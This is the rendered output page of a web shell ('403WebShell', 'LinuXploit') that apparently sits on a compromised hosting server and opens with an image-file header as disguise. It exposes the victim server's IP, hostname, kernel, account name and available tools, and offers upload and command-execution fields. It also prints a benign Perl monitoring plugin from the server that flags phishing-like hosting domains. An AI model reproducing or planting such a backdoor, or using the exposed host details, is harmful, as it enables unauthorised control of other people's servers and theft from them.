����JFIF��x�x����'403WebShell
403Webshell
Server IP : 78.140.185.180  /  Your IP : 3.146.37.183
Web Server : LiteSpeed
System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : builderbox ( 1072)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/lib64/nagios/plugins/extra/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /usr/lib64/nagios/plugins/extra/check_phishing_domains
#!/usr/bin/env perl
use extreme;
use File::Slurp;
use File::Basename;
use English;

exec "sudo $0" if $UID > 0;

my @phishing_patterns = qw/apple ayyal avito.ru belpost.by blablacar.com blablacar.com.ua blablacar.ru blocket.se byval com- cdek.ru gumtree.com ilcuod
  itunes limitresolve mymarket.ge olx.ua olx.kz olx.bg ozon.ru yandex.ru paepai paeypal paipae paivpail paiy pay.olx pavpai pavpcl pay-pa payal
  payblal payipal payp paypa paypal paypcl payypayl peypal piypyal pyai paypaal steam verification verivication youla.ru/;

my $WLFILE    = '/etc/icinga2/plinc/phishingdomainswl';
my $pattern   = join( '|', @phishing_patterns );
my $wlpattern = join( '|', split( '\n', read_file($WLFILE) ) ) if -f $WLFILE;

my $status = '0';
my @incidents;

# cpanel
if ( -d '/var/cpanel/users' ) {
    for my $user (</var/cpanel/users/*>) {
        my @userconf = read_file($user);
        my $suspended = map /^SUSPENDED=\d/, @userconf;
        next if $suspended;
        my @user_domains = map /^DNS\d*=(.*)/, @userconf;
        for my $domain (@user_domains) {
            next if $wlpattern ? $domain =~ /$wlpattern/ : 0;
            if ( $domain =~ /$pattern/ ) {
                $user =~ s|.*/||;
                push @incidents, "$user: possible phishing domain $domain";
                $status = '2';
            }
        }
    }
}

# ispmanager 5
if ( -f '/usr/local/mgr5/sbin/mgrctl' ) {
    for my $domain_info (
        `/usr/local/mgr5/sbin/mgrctl -m ispmgr webdomain | egrep -v "disabled\$"`)
    {
        my ($user)   = $domain_info =~ /owner=(.*?)\s/;
        my ($domain) = $domain_info =~ /name=(.*?)\s/;
        next if $wlpattern ? $domain =~ /$wlpattern/ : 0;
        if ( $domain =~ /$pattern/ ) {
            push @incidents, "$user: possible phishing domain $domain";
            $status = '2';
        }
    }
}

# directadmin
if ( -d '/usr/local/directadmin' ) {
    my $prefix = '/usr/local/directadmin/data/users';
    for my $list ( glob( "$prefix" . '/*' ) ) {
        my $user = basename($list);
        my @domains = read_file("$prefix/$user/domains.list");
        my $suspended = map /^suspended=yes/, read_file("$prefix/$user/user.conf");
        next if $suspended;
        for my $domain (@domains) {
            next if $wlpattern ? $domain =~ /$wlpattern/ : 0;
            if ( $domain =~ /$pattern/ ) {
                push @incidents, "$user: possible phishing domain $domain";
                $status = '2';
            }
        }
    }
}

@incidents ? say 'CRITICAL: ' . join( "\n", @incidents ) : say 'OK';

exit $status;

Youez - 2016 - github.com/yon3zu
LinuXploit